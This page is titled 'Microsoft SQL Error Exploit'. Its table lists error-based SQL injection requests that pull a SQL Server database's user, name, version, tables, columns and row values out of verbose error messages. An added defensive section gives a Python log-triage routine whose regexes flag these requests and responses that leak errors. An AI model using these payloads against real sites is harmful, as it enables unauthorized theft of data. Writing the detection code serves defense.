Microsoft SQL Error Exploit
31 Dec 2011
| Step | Request | Error message returned |
| --- | --- | --- |
| ERROR SQL INJECTION – DETECTION (Integer Injection) | http://[site]/page.asp?id=1 having 1=1-- | Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. |
| ERROR SQL INJECTION – DETECTION (String Injection) | http://[site]/page.asp?id=x' having 1=1-- | Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. |
| ERROR SQL INJECTION – EXTRACT DATABASE USER | http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- | Syntax error converting the nvarchar value '[DB USER]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT DATABASE NAME | http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME()))-- | Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT DATABASE VERSION | http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))-- | Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT SERVER NAME | http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))-- | Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 1st DATABASE TABLE | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))-- | Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 2nd DATABASE TABLE | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-1'))-- | Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 3rd DATABASE TABLE | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-2'))-- | Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))-- | Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))-- | Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))-- | Syntax error converting the nvarchar value '[COLUMN NAME 3]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- | Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))-- | Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 3rd FIELD OF 1st ROW | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))-- | Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))-- | Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int. |
| ERROR SQL INJECTION – EXTRACT 1st FIELD OF 3rd ROW | http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))-- | Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int. |
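
A defender's view of the requests and error messages listed above, as an added example that is not from the original page: a log triage routine that flags those request patterns and any response that echoes the SQL Server error text back to the client. The log shape (pairs of query string and response body), the signature names and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request patterns taken from the requests listed on this page.
REQUEST_SIGNATURES = {
    "having-probe": re.compile(r"\bhaving\s+1\s*=\s*1\b"),
    "convert-int-cast": re.compile(r"\bconvert\s*\(\s*int\s*,"),
    "schema-enumeration": re.compile(r"\bsysobjects\b|\binformation_schema\s*\.\s*columns\b"),
    "server-variable": re.compile(r"@@(version|servername)\b"),
}
# Error texts the page shows reaching the client. "Conversion failed when" is
# the wording later SQL Server versions use; it is added here, not on the page.
LEAK_SIGNATURES = (
    re.compile(r"(syntax error|conversion failed when) converting the \w+ value '", re.I),
    re.compile(r"is invalid in the select list because it is not contained", re.I),
)

def normalize(query_string):
    """URL-decode up to three times (undoes double encoding), squeeze whitespace, lowercase."""
    text = query_string
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).lower()

def match_request(query_string):
    """Return the sorted names of the signatures found in one query string."""
    text = normalize(query_string)
    return sorted(n for n, rx in REQUEST_SIGNATURES.items() if rx.search(text))

def response_leaks_error(body):
    """True when a response body echoes a raw SQL Server error to the client."""
    return any(rx.search(body) for rx in LEAK_SIGNATURES)

def triage(entries):
    """entries: (query_string, response_body) pairs -> (index, severity, hits, leaked)."""
    findings = []
    for i, (qs, body) in enumerate(entries):
        hits, leaked = match_request(qs), response_leaks_error(body)
        if hits or leaked:
            findings.append((i, "high" if hits and leaked else "medium", hits, leaked))
    return findings

# Constructed sample log entries (not from the page): (query string, response body).
SAMPLE = [
    ("id=1", "<html>Product 1</html>"),
    ("id=1+having+1%3D1--", "Column 'products.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause."),
    ("id=1%2520or%25201%253Dconvert(int%252C(%2540%2540VERSION))--", "<html>An error occurred.</html>"),
    ("id=7", "Syntax error converting the nvarchar value 'abc' to a column of data type int."),
]
```

A "high" finding means a matching request received the raw database error, which is the condition every request on this page depends on. Binding `id` as a typed query parameter and returning a generic error page removes that condition; the matcher only helps locate pages where that has not been done.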
Yu Agh